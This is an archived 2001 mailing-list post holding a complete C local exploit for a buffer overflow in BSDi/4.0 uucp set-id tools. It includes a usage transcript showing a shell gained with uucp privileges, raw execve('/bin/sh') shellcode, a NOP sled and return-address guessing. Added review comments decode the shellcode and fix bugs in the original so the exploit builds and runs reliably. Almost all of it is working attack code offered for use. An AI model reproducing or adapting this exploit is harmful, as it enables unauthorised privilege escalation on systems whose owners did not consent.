(BSDi/4.0-specific) uucp family exploit (uucp/uuparams/uuname)

From: Vade 79 (v9at_private)
Date: Sun Dec 02 2001 - 19:34:27 PST


    
    -- usage start --
    
    bash-2.02$ id                
    uid=123(t) gid=100(user) groups=100(user)
    bash-2.02$ cc bsdi_uucp.c -o bsdi_uucp
    bash-2.02$ ./bsdi_uucp -uuparams
    [ (BSDi/4.0)uucp*[]: family buffer overflow, by:
    v9at_private ]
    *** [data]: return address: 0x80474, program:
    /usr/sbin/uuparams.
    $ id
    uid=123(t) euid=6(uucp) gid=100(user) egid=6(uucp)
    groups=6(uucp), 100(user)
    $ 
    
    -- usage end --
    
    -- bsdi_uucp.c start --
    
    /* (BSDi)uucp[] family buffer overflow.  by:
       v9at_private  this yields
       euid/egid/group=6(uucp) on BSDi/4.0
       systems. (BSDi specific exploit)

       Historical proof of concept (Bugtraq, Dec 2001).  The payload is
       handed to one of three uucp-owned set-id tools as an argv element
       (see main()); per the transcript in the post the resulting shell
       runs with euid/egid 6(uucp), not root.  i386/BSDi only: the shellcode
       enters the kernel through the BSD `lcall $7,$0` gate and the return
       address is a 32-bit guess derived from this process's own %esp.

       NOTE(review): the listing as posted has no #include lines and relies
       on implicit declarations of printf/exit/strlen/memcpy/strncasecmp/
       putenv/execl.  Modern compilers warn or reject that; add
       <stdio.h> <stdlib.h> <string.h> <strings.h> <unistd.h> before building.
    */
    /* The three target binaries (one is chosen by the command-line flag). */
    #define UUCP "/usr/bin/uucp"
    #define UUPARAMS "/usr/sbin/uuparams"
    #define UUNAME "/usr/bin/uuname"
    /* Dummy argument that fills the argv slots in front of the payload. */
    #define FILLER "x"
    /* i386/BSD execve("/bin/sh") shellcode.  Decoding the bytes:
         eb 1f            jmp  to the call at the end
         5e               pop  %esi             ; %esi -> "/bin/sh"
         31 c0            xor  %eax,%eax
         89 46 f5         mov  %eax,-0xb(%esi)  ; patch lcall offset ff ff ff ff -> 0
         88 46 fa         mov  %al,-0x6(%esi)   ; patch lcall selector ff 07 -> 00 07
         89 46 0c         mov  %eax,0xc(%esi)   ; argv[1] = NULL
         89 76 08         mov  %esi,0x8(%esi)   ; argv[0] = "/bin/sh"
         50 8d 5e 08 53 56 56   push envp (NULL), lea argv, push argv,
                                push path, push a dummy return-address slot
         b0 3b            mov  $0x3b,%al        ; SYS_execve (59)
         9a ff ff ff ff 07 ff   lcall $7,$0 once the ff bytes are patched
         e8 dc ff ff ff   call back to the pop %esi
         2f 62 69 6e 2f 73 68 00   "/bin/sh"
       The lcall operand is patched at run time so the blob carries no NUL
       byte before the string terminator.  argv[] is written 8 bytes past
       the end of the blob, i.e. into whatever follows it in the target's
       copy of the environment string -- the caller must leave room there. */
    static char exec[]=
     "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46"
     "\xfa\x89\x46\x0c\x89\x76\x08\x50\x8d\x5e"
     "\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff"
     "\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62"
     "\x69\x6e\x2f\x73\x68\x00"; /* 46 bytes including the string NUL; strlen() is 45. */
    /* Print the accepted command-line syntax and terminate with status 1.
       progname is argv[0] of this program; the text goes to stdout. */
    void usage(char *progname){
        fprintf(stdout, "*** [syntax]: %s <-uucp|-uuparams|-uuname>\n", progname);
        exit(1);
    }
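    /* Return the stack pointer (%esp) as seen inside this function; main()
       adds sizeof(buf) to it to guess where the target's copy of the payload
       will sit.  i386 assumption: the value is 32 bits.
       The original version ran `movl %esp,%eax` and then fell off the end of
       a non-void function, relying on %eax still holding the value -- that is
       undefined behaviour and breaks under optimisation.  The output
       constraint below makes the value flow through C properly. */
    long pointer(void){
        long sp;
        __asm__ __volatile__("movl %%esp,%%eax" : "=a"(sp));
        return sp;
    }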
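    /* Build the two halves of the attack and exec the chosen target:
         EXEC=<NOP sled><shellcode>   placed in the environment via putenv()
         eip                          an argv element made of the guessed
                                      return address repeated, which is what
                                      overflows the target's buffer
       av[1] selects the target: -uucp (payload is argv[3] of the target),
       -uuparams or -uuname (payload is argv[2]).  Does not return on success
       (the process image is replaced); exits 1 on bad usage or exec failure.
       Fixes relative to the posted listing: the return-address loop wrote
       4 bytes past the end of eip[], the shellcode was copied without its
       terminating NUL so putenv() read past it, execl()'s list terminator
       was a plain 0 rather than a null pointer, and stdout was not flushed
       before exec. */
    int main(int ac,char **av){
        unsigned short type = 0;   /* 1: -uucp, 0: -uuparams / -uuname */
        unsigned int i = 0;
        long ret;
        char eip[1024], buf[4096];
        char *progptr = 0;         /* set below; usage() exits otherwise */

        printf("[ (BSDi/4.0)uucp*[]: family buffer overflow, by: v9at_private ]\n");

        if (ac > 1) {
            /* Prefix matches as in the original ("-uucpXYZ" is accepted too). */
            if (!strncasecmp(av[1], "-uucp", 5)) {
                progptr = UUCP;
                type = 1;
            } else if (!strncasecmp(av[1], "-uuparams", 9)) {
                progptr = UUPARAMS;
                type = 0;
            } else if (!strncasecmp(av[1], "-uuname", 7)) {
                progptr = UUNAME;
                type = 0;
            } else {
                usage(av[0]);
            }
        } else {
            usage(av[0]);
        }

        /* Guess for the address of the payload in the target: our own stack
           pointer plus the size of buf.  Assumes the target's stack is laid
           out like ours -- BSDi/4.0 specific, no ASLR. */
        ret = pointer() + sizeof(buf);

        /* eip: three 0x01 alignment bytes, then the return address repeated
           little-endian in 4-byte slots (the i386 target's word size) up to
           the last full slot that fits, then the NUL.  The original ran the
           loop to i == 1023 and stored 4 bytes past eip[1023]; stopping at
           the last full slot shortens the sled by one entry, which the NOP
           sled in buf absorbs. */
        eip[0] = eip[1] = eip[2] = 0x01;
        for (i = 3; i + 4 <= sizeof(eip) - 1; i += 4) {
            eip[i]     = (char)(ret & 0xff);
            eip[i + 1] = (char)((ret >> 8) & 0xff);
            eip[i + 2] = (char)((ret >> 16) & 0xff);
            eip[i + 3] = (char)((ret >> 24) & 0xff);
        }
        eip[i] = '\0';
        /* NOTE(review): eip travels as a C string, so any zero byte inside
           ret ends it early.  The run in the post prints 0x80474, whose top
           byte is zero, so only one partial copy was actually passed there;
           it evidently still worked, but check this on the target. */

        /* buf: "EXEC=" + NOP sled + shellcode.  The sled length subtracts
           strlen(eip) so that env string + argv payload keep a fixed total
           size (presumably to keep the target's stack layout stable --
           confirm).  strlen(exec) is 45; with strlen(eip) >= 3 the string
           NUL lands inside buf. */
        for (i = 0; i < sizeof(buf) - strlen(exec) - strlen(eip); i++) {
            buf[i] = (char)0x90;
        }
        /* +1 copies the shellcode's terminating NUL; the original copied
           strlen(exec) bytes and handed putenv() an unterminated string. */
        memcpy(buf + i, exec, strlen(exec) + 1);
        memcpy(buf, "EXEC=", 5);
        if (putenv(buf) != 0) {
            printf("*** [error]: could not set EXEC in the environment.\n");
            exit(1);
        }

        printf("*** [data]: return address: 0x%lx, program: %s.\n", ret, progptr);
        /* stdout is fully buffered when not a tty; flush before the image is
           replaced or the line above is lost. */
        fflush(stdout);

        /* -uucp takes the payload as argv[3], the others as argv[2].
           execl() only returns on failure. */
        if (type) {
            execl(progptr, progptr, FILLER, FILLER, eip, (char *)0);
        } else {
            execl(progptr, progptr, FILLER, eip, (char *)0);
        }
        printf("*** [error]: could not execute %s successfully.\n", progptr);
        exit(1);
    }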
    
    -- bsdi_uucp.c end --
    
    Vade79 -> v9at_private ->
    fakehalo.deadpig.org
    


